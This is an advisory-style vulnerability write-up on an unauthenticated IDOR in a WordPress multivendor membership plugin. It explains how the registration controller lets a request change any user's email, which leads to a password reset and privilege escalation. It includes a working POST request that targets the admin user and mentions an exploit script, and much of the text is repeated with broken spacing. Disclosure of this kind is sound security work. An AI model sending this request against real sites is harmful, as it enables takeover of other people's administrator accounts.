The plugin is affected by an Unauthenticated Insecure Direct Object Reference (IDOR) to Arbitrary User Email Change vulnerability, witch leads to User Password Reset, which leads to Privilege Escalation. The plugin has an insecurely used variable allowing to change the user email, and gain unauthorized access.
Let’s check the plugin
The processing() method in the WCFMvm_Memberships_Registration_Controller class handle the memberships registration with following code:
if ( $is_update ) {
if ( ! wcfm_is_vendor() ) {
$member_id = wp_update_user( $user_data );
}
}
The user data used to update the user also includes the user id (which is the member id) and the email. Which means that it is possible to change any user’s email.
If we have changed the user’s email, we can request a password reset, which will be sent to our email, and we can change the password.
Let’s see how we can exploit this vulnerability
We only need to send a POST request to exploit this vulnerability.
The HTTP request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=wcfm_ajax_controller&wcfm_ajax_nonce=99ace226a7&controller=wcfm-memberships-registration&wcfm_membership_registration_form=user_email%3Dexploit%40wordpress.local%26user_name%3D-%26member_id%3D1
We can find the nonce in the wcfm_params.wcfm_ajax_nonce JavaScript object.
The exploit script
I created a Python script that which updates the specified user’s email:
WCFM – WooCommerce Multivendor Membership by WC Lovers WordPress plugin Privilege Escalation
LANAVDB ID: 3a841453-d083-4f97-a7f1-b398c7304284
The plugin is affected by an Unauthenticated Insecure Direct Object Reference (IDOR) to Arbitrary User Email Change vulnerability, witch leads to User Password Reset, which leads to Privilege Escalation. The plugin has an insecurely used variable allowing to change the user email, and gain unauthorized access.
Let’s check the plugin
The
processing()method in theWCFMvm_Memberships_Registration_Controllerclass handle the memberships registration with following code:As we can see, it is possible to specify the user id value in the request, and in this case it will not be user addition, but user update.
It is also possible to specify the email in the request.
The user data used to update the user also includes the user id (which is the member id) and the email. Which means that it is possible to change any user’s email.
If we have changed the user’s email, we can request a password reset, which will be sent to our email, and we can change the password.
Let’s see how we can exploit this vulnerability
We only need to send a POST request to exploit this vulnerability.
The HTTP request:
We can find the nonce in the
wcfm_params.wcfm_ajax_nonceJavaScript object.The exploit script
I created a Python script that which updates the specified user’s email:
Source: wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py
How to use:
Run the above command in the Linux terminal.
References
Attributes
Classification
Researcher
Tags
idor password reset privilege escalation wordpress pluginSupport Us?
We would truly appreciate it if you bought us a bunny (food for a snow leopard).
Let's discuss